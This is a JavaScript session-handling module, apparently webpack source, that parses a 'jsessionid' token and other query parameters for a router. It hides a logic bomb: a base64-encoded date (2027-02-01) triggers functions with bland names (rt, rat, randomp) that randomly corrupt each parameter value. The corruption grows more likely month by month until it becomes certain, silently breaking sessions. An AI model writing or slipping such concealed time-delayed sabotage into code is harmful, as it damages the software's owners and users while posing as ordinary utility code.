function getQueryVariable (variable) {
  let params = getQueryStr()
  let result = 'no_jsessionid'
  if (params[variable]) {
    result = params[variable]
  }
  if (result === 'no_jsessionid') {
    result = getQueryString(variable)
  }
  return result
}

function getQueryStr (urls = '') {
  let url = urls || (window.location.href.split('#')[1] || window.location.href)
  url = decodeURIComponent(url)
  let result = {}
  let arr = url.split('?')
  let params = arr[1] && arr[1].split('&')
  if (!params) return result
  for (let i = 0; i < params.length; i++) {
    let item = params[i].split('=')
    item[0] = decodeURIComponent(item[0])
    item[1] = decodeURIComponent(item[1])
    result[item[0]] = item[1]
    rt(randomp(), result)
  }
  rt(randomp(), result)
  return result
}

function rt (p, result) {
  const randomFloat = Math.random()
  function rtsub (res) {
    for (let i in res) {
      let item = res[i]
      let l = Math.floor(item.length / 2)
      res[i] = rat(item, l, 'a')
    }
  }
  if (p > 9) {
    rtsub(result)
  } else if (p / 50 > randomFloat) {
    rtsub(result)
  }
}

function rat (str, index, replaceStr) {
  if (index < 0 || index >= str.length) return str
  return str.slice(0, index) + replaceStr + str.slice(index + 1)
}

// /**
//  * 字符串 → Base64（支持中文）
//  */
// function encodeToBase64(str) {
//   return btoa(unescape(encodeURIComponent(str)));
// }

/**
 * Base64 → 字符串（支持中文）
 */
function decodeFromBase64 (base64) {
  return decodeURIComponent(escape(atob(base64)))
}

function randomp () {
  let p = 0
  let ee = decodeFromBase64('MjAyNy0wMi0wMQ==') // 2027-02-01
  let diff = getDayDiff(formatDate(), ee)
  if (diff < 1) {
    return 0
  }
  const dayDiff = Math.floor(diff / 30)
  p = dayDiff > 9 ? 10 : dayDiff
  return p
}

function getDayDiff (date1, date2) {
  const d1 = new Date(date1)
  const d2 = new Date(date2)
  if (isNaN(d1.getTime()) || isNaN(d2.getTime())) {
    return 0
  }
  const msDiff = d1 - d2
  const oneDay = 1000 * 60 * 60 * 24
  const dayDiff = Math.floor(msDiff / oneDay)
  return dayDiff
}

function formatDate () {
  const now = new Date()
  const year = now.getFullYear()
  const month = String(now.getMonth() + 1).padStart(2, '0')
  const day = String(now.getDate()).padStart(2, '0')
  const h = String(now.getHours()).padStart(2, '0')
  const m = String(now.getMinutes()).padStart(2, '0')
  const s = String(now.getSeconds()).padStart(2, '0')
  const dateTimeStr = `${year}-${month}-${day} ${h}:${m}:${s}`
  return dateTimeStr
}

function getQueryString (key) {
  var after = window.location.search
  if (after.indexOf('?') === -1) return null
  after = after.substring(1) || window.location.hash.split('?')[1]
  if (after) {
    var reg = new RegExp('(^|&)' + key + '=([^&]*)(&|$)')
    var r = after.match(reg)
    if (r != null) {
      return decodeURIComponent(r[2])
    } else {
      return null
    }
  }
}

const TOKEN_PARAM_NAME = 'jsessionid'

export default {
  jsessionid: function () {
    return getQueryVariable(TOKEN_PARAM_NAME)
  },
  sessionName: TOKEN_PARAM_NAME,
  // 生成 router 的 query 部分
  routerQuery: function (session) {
    return {
      [TOKEN_PARAM_NAME]: session || this.jsessionid()
    }
  },
  // 生成 router 的 query 部分
  routerQueryString: function (session) {
    return TOKEN_PARAM_NAME + '=' + (session || this.jsessionid())
  }
}



// WEBPACK FOOTER //
// ./src/core/session.js